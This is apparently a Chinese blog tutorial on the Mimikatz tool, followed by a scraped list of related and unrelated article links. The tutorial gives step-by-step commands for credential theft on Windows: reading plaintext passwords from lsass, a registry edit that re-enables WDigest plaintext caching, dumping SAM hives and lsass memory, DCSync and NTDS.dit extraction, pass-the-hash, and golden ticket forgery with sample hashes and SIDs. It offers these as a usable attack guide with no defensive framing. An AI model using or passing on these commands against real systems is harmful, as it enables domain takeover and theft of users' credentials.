简介

Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码!也就是说只要你不重启电脑,就可以通过他获取到登陆密码,只限当前登陆系统!

使用:

- 获取本地账号密码

#提升权限
privilege::debug#抓取密码
sekurlsa::logonpasswords


当目标为win10或者2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。
cmd修改注册表命令

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

- SAM表获取hash

#导出SAM数据
reg save HKLM\SYSTEM SYSTEM
reg save HKLM\SAM SAM#使用mimikatz提取hash
lsadump::sam /sam:SAM /system:SYSTEM

- Procdump+Mimikatz
当mimikatz无法在主机上运行时,可以使用微软官方发布的工具Procdump导出lsass.exe:

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

将lsass.dmp下载到本地后,然后执行mimikatz:

sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full

为了方便复制与查看,可以输出到本地文件里面

mimikatz.exe  sekurlsa::logonPasswords full > pssword.txt


  • 读取域控中域成员Hash
    域控以上域管理员身份执行mimikatz
#提升权限
privilege::debug
抓取密码
lsadump::lsa /patch

方法二:通过 dcsync,利用目录复制服务(DRS)从NTDS.DIT文件中检索密码哈希值,可以在域管权限下执行获取:

#获取所有域用户
lsadump::dcsync /domain:test.com /all /csv#指定获取某个用户的hash
lsadump::dcsync /domain:test.com /user:test
  • 导出域成员Hash
    域账户的用户名和hash密码以域数据库的形式存放在域控制器的%SystemRoot%\ntds\NTDS.DIT文件中。
    这里可以借助: ntdsutil.exe,域控制器自带的域数据库管理工具,我们可以通过域数据库,提取域种所有的域用户信息,在域控上执行如下命令,导入域数据库。
#创建快照
ntdsutil snapshot "activate instance ntds" create quit quit#加载快照
ntdsutil snapshot "mount {72ba82f0-5805-4365-a73c-0ccd01f5ed0d}" quit quit#Copy文件副本
copy C:\$SNAP_201911211122_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds.dit
  • 哈希传递攻击
    当我们获得了一台主机得NTLM哈希值,我们可以使用mimikatz对其进行哈希传递攻击。执行完命令后,会弹出cmd窗口。
#使用administrator用户的NTLM哈希值进行攻击
sekurlsa::pth /user:administrator /domain:192.168.10.15 /ntlm:329153f560eb329c0e1deea55e88a1e9

#使用xie用户的NTLM哈希值进行攻击
sekurlsa::pth /user:xie /domain:192.168.10.15 /ntlm:329153f560eb329c0e1deea55e88a1e9

- 域环境
在域环境中,当我们获取得了域内用户得HTML哈希值,我们可以使用域内得一台主机用mimikatz对域控进行哈希传递攻击。执行完命令后,会弹出cmd窗口。前提是我们必须拥有域内任意一台主机得本地administrator权限和获得了域内用户得NTLM哈希值
域:xie.com
域控:WIN2008.xie.com

#使用域管理员administrator的NTLM哈希值对域控进行哈希传递攻击
sekurlsa::pth /user:administrator /domain:"xie.com" /ntlm:dbd621b8ed24eb627d32514476fac6c5

#使用域用户xie的NTLM哈希值对域控进行哈希传递攻击
sekurlsa::pth /user:xie /domain:"xie.com" /ntlm:329153f560eb329c0e1deea55e88a1e9

票据传递攻击PPT

- 黄金票据
域内每个用户得ticket都是由krbtgt的密码hash来计算生成的,因此只要获取到了krbtgt用户的密码Hash,就可以随意伪造Ticket,进而使用Ticket登录域控制器,使用krbtgt用户hash生成的票据被称为Golden Ticket,此类攻击方法被称为票据传递攻击。
首先获取krbtgt的用户hash:

mimikatz "lsadump::dcsync /domain:xx.com /user:krbtgt"

利用 mimikatz 生成域管权限的 Golden Ticket,填入对应的域管理员账号、域名称、sid值,如下:

kerberos::golden /admin:administrator /domain:ABC.COM /sid:S-1-5-21-3912242732-2617380311-62526969 /krbtgt:c7af5cfc450e645ed4c46daa78fe18da /ticket:test.kiribi

#导入刚才生成的票据
kerberos::ptt test.kiribi#导入成功后可获取域管权限
dir \\dc.abc.com\c$

Mimikatz使用相关推荐

  1. 利用Procdump+Mimikatz获取Windows帐户密码

    0x01 前言: 前段时间拿下一个网站的shell,很幸运的是直接就是System权限,结果发现执行添加用户命令并不能成功回显 看了下系统进程,原来是开启了360的主动防御,奈何也不会做免杀,上传ex ...

  2. 域用户组成员 导出_隐私安全,黑客利用Mimikatz提取Windows用户凭证

    一.前言一.mimikatz简介 是法国人Gentil Kiwi编写的一款windows平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe 进程里获取windows处于activ ...

  3. 【安全研究】从mimikatz学习万能密码——上

    1.背景介绍 2015年1月2日,Dell Secureworks共享了一份关于利用专用域控制器(DC)恶意软件(名为"SkeletonKey"恶意软件)进行高级攻击活动的报告,S ...

  4. 【安全】从mimikatz学习Windows安全之访问控制模型

    前言 上次的文章分析了mimikatz的token模块,并简单介绍了windows访问控制模型的概念.在本篇文章中,主要介绍sid相关的概念,并介绍mimikatz的sid模块,着重分析sid::pa ...

  5. mimakatz用法_两步完成利用procdump64+mimikatz获取win用户密码

    使用procdump64+mimikatz可实现从内存中获取明文密码 工具 链接:https://pan.baidu.com/s/1gNc9qLcNSNBohIVrAiqShw 密码:fc38 首先得 ...

  6. 内网渗透,横向移动总结(mimikatz域控)

    目录 前言 利用windows远程连接命令 ipc连接 at命令 schtasks命令 (在2008及以后的系统中已经将at命令废弃,改用schtasks命令代替了at命令) 利用windows服务 ...

  7. Mimikatz 非官方指南和命令参考_Part1

    Her0in · 2016/01/28 10:26 原文地址:adsecurity.org/?page_id=18- 原文作者:Sean Metcalf 译者注: 由于原文中,作者(Sean Metc ...

  8. Mimikatz各模块基本用法

    privilege::debug ****获得系统权限,优先运行该命令 Lsadump 与LSA交互 lsadump::dcsync /user:用户名或sid,向DC要一个号的密码 ,/all就是要 ...

  9. win 7使用mimikatz实现MS14-068漏洞

    一.漏洞说明 该漏洞可能允许攻击者将未经授权的域用户账户的权限,提权到域管理员的权限.微软官方解释: https://docs.microsoft.com/zh-cn/security-updates ...

  10. Mimikatz获取系统密码攻防研究

    Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是 ...

最新文章

  1. jsp的jstl的foreach标签
  2. Magic Leap有新动态!成立由斯蒂芬森领头的内容团队
  3. 素数个数(信息学奥赛一本通-T1151)
  4. 16 bit float 存储_浅谈float和double
  5. Python Tricks(十五)—— repeat(字符串重复)
  6. aardio中获取网络图片经GDI处理后保存到本地
  7. Java反射机制demo(三)—获取类中的构造函数
  8. 小米一键上锁工具_小米手机通用解锁教程
  9. 西门子mag6000接线_西门子(SIEMENS)妙声力系列电磁流量计变送器MAGFLO MAG5000 MAG6000中文使用手册.pdf...
  10. PCB板制造工艺讲解,动图揭秘PCB板生产流程
  11. 昂达ONDA B460SD4 UEFI模式刷BIOS教程
  12. html入住登记源码,酒店客户入住登记管理系统设计与实现.doc
  13. java volatile理解
  14. Word 中,字体无法调整的解决方法
  15. 弱网测试工具-ATC和NEWT
  16. 微信小程序消息推送功能开发(java实现)
  17. sql --Acess
  18. 计算机网络研学日志,2020小学信息技术工作研修日志
  19. 2022腾讯云年终11.11活动优惠提前享: 一键领取元1888元早鸟券
  20. Android bitmap加载占用内存分析(draw too large bitmap)

热门文章

  1. 手写识别字体的步骤是什么?怎么识别图片中的文字?
  2. iis php 404错误页面,IIS自定义404错误页面
  3. win10系统盘多大合适_韩博士装机大师一键重装win10系统
  4. C++学习课件(二)————面向对象
  5. android手机助手哪个好,手机助手哪个好用
  6. 超详细排列组合问题解法
  7. 为你的vscode换个字体
  8. 华为平板m3不升级鸿蒙,【简讯】AMD Zen4最新消息:IPC提升20%;realme徐起:手机市场下半年必迎涨价潮…...
  9. 基于CTC转换器的自动拼写校正端到端语音识别
  10. osgEarth的Rex引擎原理分析(一二五)着色器源代码加工处理过程